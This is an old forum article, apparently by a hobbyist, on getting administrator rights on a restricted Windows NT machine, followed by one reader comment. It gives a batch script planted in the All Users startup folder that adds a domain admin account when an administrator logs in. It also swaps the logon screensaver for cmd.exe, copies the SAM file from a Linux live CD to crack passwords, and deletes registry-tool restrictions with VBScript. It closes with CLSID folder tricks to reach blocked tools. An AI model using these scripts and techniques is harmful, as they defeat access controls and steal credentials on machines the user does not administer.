getting admin rights on a local nt box.
getting admin rights on a local nt box.
How to get admin
this article contains ideas and techniques to get admin on you local windows machine, please not that they all if them might not work. I have found and tested some of them and others i have found on the internet.
Please note that sub-techniques are also listened at the end of the article, this involves ways to get admin tools, control panels and the command prompt. some of these sub-techniques may be used in he main techniques.
Technique 1
This is an idea that i thought up although recently i have seen it on the internet so its not an original idea. It involves putting a batch script in the admin startup folder. the batch script will then create a user that is in the admin group. This might not work but there is a technique that you can use so that you can write to the C:\ drive. if you can write to the C:\ then there is nothing to worry about.
First open notepad or a similar program.
then enter this code:
echo off
Net user %user% <password> /active /domain /add
Net local group Administrators %user% /add
Net group "Domain Admins" %user% /add /domain
Net group "Guests" %user% /delete /domain
Now save the text file as < name >.bat
Next we have to save it to the admins startup.
there are two ways to copy the file. you can just copy and past the the folder if you have access or use the command prompt. the command prompt is usually blocked but i will go over that later on.
the file usually is C:\WINNT\Profiles\All users\Start Menu\Programs\Startup\.
if you cant copy and paste the program then you could try using a .bat file. just do the same as before except enter:
copy < name >.bat C:\WINNT\Profiles\All users\Start Menu\Programs\Startup\
then just double click. also this batch file must be in the same directory as the batch file that it is copying.
then you just have to wait for an admin to log in.
Technique 2
this way is quite an obvious idea when you think about it. it involves replacing the screensaver with the command prompt. to do this you will need to be able to use the command prompt or use a batch file.
To make the batch file simple do as before and enter:
copy C:\winnt\system32\logon.scr C:\winnt\system32\logon.scr.old del C:\winnt\system32\logon.scr copy C:\winnt\system32\cmd.exe C:\winnt\system32\logon.scr Next we log-out then log back in. we have to wait now for the screensaver to start and when it does we will get a command prompt with full admin rights.
But if we want to change it back( so no one else can get admin rights) we simple make another batch file and enter:
copy C:\winnt\system32\logon.scr.old C:\winnt\system32\logon.scr
We made a copy so we can change it back in the first line of the batch file that replaces the screensaver with the command prompt. We must always remember to make backups of things we change… its not nice for the real admins.
Technique 3
This is a widely used one. It involves downloading a live cd of Linux. A live cd is basically one you don't have to install and you can run off a cd. The best one for this is Knoppix or Phlak, you can get these free, just google for them. after you burn them to a disc pop them in the cd and it should boot up. on the desktop click on the hard drive icon and you should be in the “C:\†drive.
go to :
C/WINNT/system32/config/
now there should be a file called SAM. copy that and put it to a floppy.
After that you should crack it. Google for SAM cracking programs.
you should mess about with Linux to get used to it first thought.
Sub-techniques
Getting the command prompt.
There are many ways to get this, it all really depends on the security.
One way is to go to:
start>all programs> accessories> command prompt.
but that will most probably not work.
Also you could try:
start>run>cmd
but that most probably wont work ether.
another way is to make a batch file. you just do the same as before except type:
cmd
Getting regedit.
Regedit is usually block but by renaming it you can sometimes get by it. To rename it simple make a batch file containing:
copy C:\WINNT\regedit.exe C:\WINNT\regedit.com
that is one way.
this is another way:
open notepad and enter:
On Error Resume Next 'Prevents errors from values that don't exist Set WshShell = WScript.CreateObject("WScript.Shell") 'Delete DisableRegistryTools registry values
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools" WshShell.RegDelete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
'display message Message = "You should have access to Regedit now"
X = MsgBox(Message, vbOKOnly, "Done") Set WshShell = Nothing Set fso = Nothing
now save it as anything.vbs
and now double click on it and it should enable it.
control panel
to get the control panel… and other stuff… you use cls-id's. this stands for class id. these are codes that go at the end of a folder name.
to get use the cls-ids make a folder and name it:
<anything>.<cls-id> e.g.
control panel.{305CA226-D286-468e-B848-2B2E8E697B74}
here are a list of more:
Printers: {2227A280-3AEA-1069-A2DE-08002B30309D} Control panel: {21EC2020-3AEA-1069-A2DD-08002B30309D} Dial-up networking: {992CFFA0-F557-101A-88EC-00DD010CCC48} Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} Folder options: {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} Dial-Up Networking: {992CFFA0-F557-101A-88EC-00DD010CCC48} Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} Taskbar and startmenu: {0DF44EAA-FF21-4412-828E-260A8728E7F1} Microsoft FTP folder {63da6ec0-2e98-11cf-8d82-444553540000} Temporary Internet files {7BD29E00-76C1-11CF-9DD0-00A0C9034933} ActiveX Cache folder {88C6C381-2E85-11D0-94DE-444553540000 Subscriptions folder {F5175861-2688-11d0-9C5E-00AA00A45957} History {FF393560-C2A7-11CF-BFF4-444553540000}
ghost 18 years ago
hy.. i have a question… (sory if this is not the best way/place to ask).. you typed "write to the C:&*92; drive" … does that c:&*92; actually mean "c:/"..
other than that looks like a very solid article.. cheers :D